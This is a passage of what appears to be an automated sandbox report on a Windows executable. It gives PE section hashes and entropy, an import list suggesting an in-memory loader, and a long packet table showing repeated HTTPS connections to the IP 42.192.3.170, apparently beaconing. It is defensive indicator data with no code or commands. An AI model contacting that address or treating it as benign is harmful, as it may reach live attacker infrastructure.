                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x500600x28.rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x542240x1e8.idata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x20a80x2200ba98beafce4128c14539a20f3e854b25False0.5734145220588235data6.010394259460846IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data0x40000x4bcf00x4be00ac1c34563f56dbeb85d2b50c8636bbe4False0.6249292112850082dBase III DBT, version number 0, next free block index 10, 1st item "\017\250\357h\017\250\357h\017\250\357h\017C\354h\177\250\357h\017\250\357h\017\250\357h\017\210\354h\177\256\357h\017\250\357h\017\250\357h\017\250\357h\017\250\357h\017\250\357h\017\250\357h!\334\212\020{\250\357h\215\251\354h\017\270\357h\017\252\354h\017\254\357h\017\250\357h\017\250\357h\017\250\357h/\250\357\010!\332\213\011{\311\357h"7.238728588310928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rdata0x500000x9100xa005fcc7830b4dcd602b35eeb7f1712e8faFalse0.241796875data4.459688665734325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                  .pdata0x510000x2b80x400f88aef14dea168f37249daf0dce04c78False0.37890625data3.2311971178670404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                  .xdata0x520000x2380x4006ce9e303fb86766d702ecb2b174cf348False0.2578125data2.6337753778508075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                  .bss0x530000x9d00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata0x540000x8d80xa003aae8d98b4d34bad008e73a14573bffdFalse0.323828125data3.966749721413537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .CRT0x550000x680x20052d79e9aecf5d5c3145d3ec54aa197a8False0.0703125data0.2709192282599745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .tls0x560000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Imports

                  DLLImport
                  KERNEL32.dllCloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
                  msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf

                  Network Behavior

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 3, 2025 02:51:55.619195938 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:55.619234085 CET4434973042.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:55.619332075 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:55.654558897 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:55.654581070 CET4434973042.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:56.875539064 CET4434973042.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:56.875619888 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.117341042 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.117362022 CET4434973042.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:57.117618084 CET4434973042.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:57.117677927 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.120023012 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.163338900 CET4434973042.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:57.452617884 CET4434973042.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:57.452676058 CET4434973042.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:57.452707052 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.452730894 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.465059042 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.465071917 CET4434973042.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:57.465115070 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.465137005 CET49730443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.583560944 CET49731443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.583596945 CET4434973142.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:57.583662987 CET49731443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.583831072 CET49731443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:57.583844900 CET4434973142.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:58.765719891 CET4434973142.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:58.765790939 CET49731443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:58.766422033 CET49731443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:58.766432047 CET4434973142.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:58.772175074 CET49731443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:58.772180080 CET4434973142.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:59.302917004 CET4434973142.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:59.302970886 CET4434973142.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:59.303009987 CET49731443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:59.303035975 CET49731443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:59.315124035 CET49731443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:59.315148115 CET4434973142.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:59.315156937 CET49731443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:59.315193892 CET49731443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:59.432979107 CET49732443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:59.433031082 CET4434973242.192.3.170192.168.2.4
                  Jan 3, 2025 02:51:59.433109045 CET49732443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:59.433311939 CET49732443192.168.2.442.192.3.170
                  Jan 3, 2025 02:51:59.433329105 CET4434973242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:00.609662056 CET4434973242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:00.609740019 CET49732443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:00.610577106 CET49732443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:00.610589027 CET4434973242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:00.611712933 CET49732443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:00.611718893 CET4434973242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:01.163279057 CET4434973242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:01.163342953 CET4434973242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:01.163367033 CET49732443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:01.163393021 CET49732443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:01.188194036 CET49732443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:01.188216925 CET4434973242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:01.188227892 CET49732443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:01.188262939 CET49732443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:01.302194118 CET49733443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:01.302228928 CET4434973342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:01.302313089 CET49733443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:01.302664042 CET49733443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:01.302675962 CET4434973342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:02.459882021 CET4434973342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:02.459943056 CET49733443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:02.510170937 CET49733443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:02.510179996 CET4434973342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:02.524283886 CET49733443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:02.524287939 CET4434973342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:03.165819883 CET4434973342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:03.165869951 CET4434973342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:03.165889025 CET49733443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:03.166704893 CET49733443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:03.166704893 CET49733443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:03.166704893 CET49733443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:03.302351952 CET49734443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:03.302392960 CET4434973442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:03.302480936 CET49734443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:03.302692890 CET49734443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:03.302707911 CET4434973442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:04.479621887 CET4434973442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:04.479804993 CET49734443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:04.480345964 CET49734443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:04.480355978 CET4434973442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:04.481489897 CET49734443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:04.481494904 CET4434973442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:05.017077923 CET4434973442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:05.017132998 CET4434973442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:05.017245054 CET49734443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:05.017245054 CET49734443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:05.030837059 CET49734443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:05.030858994 CET4434973442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:05.030868053 CET49734443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:05.030905962 CET49734443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:05.146013975 CET49735443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:05.146045923 CET4434973542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:05.146131992 CET49735443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:05.146380901 CET49735443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:05.146390915 CET4434973542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:06.304135084 CET4434973542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:06.304212093 CET49735443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:06.304788113 CET49735443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:06.304795027 CET4434973542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:06.305881977 CET49735443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:06.305886030 CET4434973542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:06.835644007 CET4434973542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:06.835684061 CET4434973542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:06.835707903 CET49735443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:06.835733891 CET49735443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:06.849103928 CET49735443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:06.849116087 CET4434973542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:06.849124908 CET49735443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:06.849164009 CET49735443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:06.958478928 CET49736443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:06.958518028 CET4434973642.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:06.958615065 CET49736443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:06.958818913 CET49736443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:06.958831072 CET4434973642.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:08.143825054 CET4434973642.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:08.143920898 CET49736443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:08.144284010 CET49736443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:08.144293070 CET4434973642.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:08.145541906 CET49736443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:08.145545959 CET4434973642.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:08.674175024 CET4434973642.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:08.674215078 CET4434973642.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:08.674246073 CET49736443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:08.674267054 CET49736443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:08.674593925 CET49736443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:08.674606085 CET4434973642.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:08.674617052 CET49736443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:08.674665928 CET49736443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:08.802382946 CET49737443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:08.802434921 CET4434973742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:08.802520990 CET49737443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:08.802825928 CET49737443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:08.802844048 CET4434973742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:10.004683971 CET4434973742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:10.004885912 CET49737443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:10.005530119 CET49737443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:10.005537987 CET4434973742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:10.006690979 CET49737443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:10.006697893 CET4434973742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:10.561916113 CET4434973742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:10.561956882 CET4434973742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:10.562186956 CET49737443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:10.562298059 CET49737443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:10.562321901 CET4434973742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:10.562331915 CET49737443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:10.562371016 CET49737443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:10.677278042 CET49738443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:10.677308083 CET4434973842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:10.677390099 CET49738443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:10.677618027 CET49738443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:10.677628994 CET4434973842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:11.906311989 CET4434973842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:11.906367064 CET49738443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:11.906852007 CET49738443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:11.906857967 CET4434973842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:11.908025026 CET49738443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:11.908030987 CET4434973842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:12.486169100 CET4434973842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:12.486215115 CET4434973842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:12.486232996 CET49738443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:12.486290932 CET49738443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:12.486587048 CET49738443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:12.486587048 CET49738443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:12.486598969 CET4434973842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:12.486783028 CET49738443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:12.614850044 CET49740443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:12.614896059 CET4434974042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:12.616863012 CET49740443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:12.617078066 CET49740443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:12.617094994 CET4434974042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:13.799782991 CET4434974042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:13.800790071 CET49740443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:13.801110983 CET49740443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:13.801119089 CET4434974042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:13.802273035 CET49740443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:13.802278996 CET4434974042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:14.354796886 CET4434974042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:14.354840040 CET4434974042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:14.354862928 CET49740443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:14.354907036 CET49740443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:14.355114937 CET49740443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:14.355135918 CET4434974042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:14.355158091 CET49740443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:14.355180979 CET49740443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:14.475826979 CET49745443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:14.475847006 CET4434974542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:14.476046085 CET49745443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:14.477336884 CET49745443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:14.477348089 CET4434974542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:15.680933952 CET4434974542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:15.681022882 CET49745443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:15.681370020 CET49745443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:15.681380033 CET4434974542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:15.686988115 CET49745443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:15.686992884 CET4434974542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:16.215660095 CET4434974542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:16.215718985 CET4434974542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:16.215719938 CET49745443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:16.215780973 CET49745443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:16.223691940 CET49745443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:16.223706007 CET4434974542.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:16.223715067 CET49745443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:16.223757982 CET49745443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:16.333590031 CET49747443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:16.333609104 CET4434974742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:16.333679914 CET49747443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:16.334033966 CET49747443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:16.334043980 CET4434974742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:17.533596039 CET4434974742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:17.533678055 CET49747443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:17.534271955 CET49747443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:17.534281015 CET4434974742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:17.539144993 CET49747443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:17.539149046 CET4434974742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:18.083178997 CET4434974742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:18.083246946 CET4434974742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:18.083246946 CET49747443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:18.083295107 CET49747443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:18.090907097 CET49747443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:18.090920925 CET4434974742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:18.090931892 CET49747443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:18.090969086 CET49747443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:18.192908049 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:18.192935944 CET4434974842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:18.193025112 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:18.193209887 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:18.193221092 CET4434974842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:19.376979113 CET4434974842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:19.377033949 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:19.378906965 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:19.378914118 CET4434974842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:19.381108046 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:19.381113052 CET4434974842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:19.928119898 CET4434974842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:19.928175926 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:19.928191900 CET4434974842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:19.928204060 CET4434974842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:19.928231955 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:19.928253889 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:19.964771032 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:19.964791059 CET4434974842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:19.964798927 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:19.964837074 CET49748443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:20.067984104 CET49749443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:20.068031073 CET4434974942.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:20.068126917 CET49749443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:20.068341970 CET49749443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:20.068355083 CET4434974942.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:21.290194035 CET4434974942.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:21.290287971 CET49749443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:21.290704966 CET49749443192.168.2.442.192.3.170
